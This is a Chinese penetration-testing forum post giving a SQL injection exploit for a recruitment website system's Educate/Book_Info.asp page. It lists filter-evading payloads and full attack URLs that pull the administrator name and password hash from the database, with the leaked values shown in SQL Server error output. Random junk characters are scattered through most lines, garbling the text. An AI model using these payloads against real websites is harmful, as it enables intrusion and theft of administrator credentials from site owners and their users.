中国网络渗透测试联盟

标题: 网络求职招聘人才网站系统正式版注入 [打印本页]

作者: admin    时间: 2013-2-16 21:44
标题: 网络求职招聘人才网站系统正式版注入
漏洞出现在Educate/Book_Info.asp
1 L1 n% ^5 g, h" r& c 0 f* U& w& i8 J: V$ o6 `
此处注入点虽然过滤了一些关键字 但是我们还是可以盲注的 可以利用sqlmap跑出/ [# P6 j! k- g( q
3 f4 A, N5 J( f% S# W
exp:如下
! f$ S7 W1 J; Z( I" w) W2 z查询管理账号:+aNd+0=(selEct+toP+1+su_SupperName+frOm+pH_Web_Supper)9 M9 Y1 {& K, a: X
查询管理密码:+aNd+0=(selEct+toP+1+su_Password+frOm+pH_Web_Supper)
! U/ S% e. u+ _; X% {1 ^  G  U
+ `7 E5 I. y+ ~9 |. ?http://www.xxx.com /Educate/Book_Info.asp?Param=20+aNd+0=(selEct+toP+1+su_SupperName+frOm+pH_Web_Supper)
4 J5 G2 z+ l% A5 F+ L* a
8 F- l/ G! p& B- `( o8 ^: T/ zMicrosoft OLE DB Provider for SQL Server 错误 '80040e07'
- e9 }3 U% A# q, d' @
+ A" ]  O' D5 h' b. n1 g" ^将 nvarchar 值 'hackbase' 转换为数据类型为 int 的列时发生语法错误。" g6 `0 L! n7 t3 i3 c& B' l$ i

% e+ A" {3 B* m/Educate/Book_Info.asp,行 84 e. }$ u; ?0 T1 O7 G: }$ t

# G6 k- t% g; [$ q- I" N. K+ ^http://www.xxx.com /Educate/Book_Info.asp?Param=20+aNd+0=(selEct+toP+1+su_Password+frOm+pH_Web_Supper)  V+ O, _+ g' b# y" {

5 a" ?1 M+ q$ F4 C7 m% jMicrosoft OLE DB Provider for SQL Server 错误 '80040e07'7 z: U8 r8 @! j4 `8 k$ ^$ F, Q
0 T. ]; D! A  D2 Y( }
将 nvarchar 值 '165706AD8319D7F95B7FC5E82FBE8F' 转换为数据类型为 int 的列时发生语法错误。' A. w) F' t# M2 d6 g6 Y' `2 t1 _9 Z
1 D$ c7 g; e5 A8 R4 A$ v' U$ m
/Educate/Book_Info.asp,行 8  E! J4 N# O0 N9 `





欢迎光临 中国网络渗透测试联盟 (https://cobjon.com/) Powered by Discuz! X3.2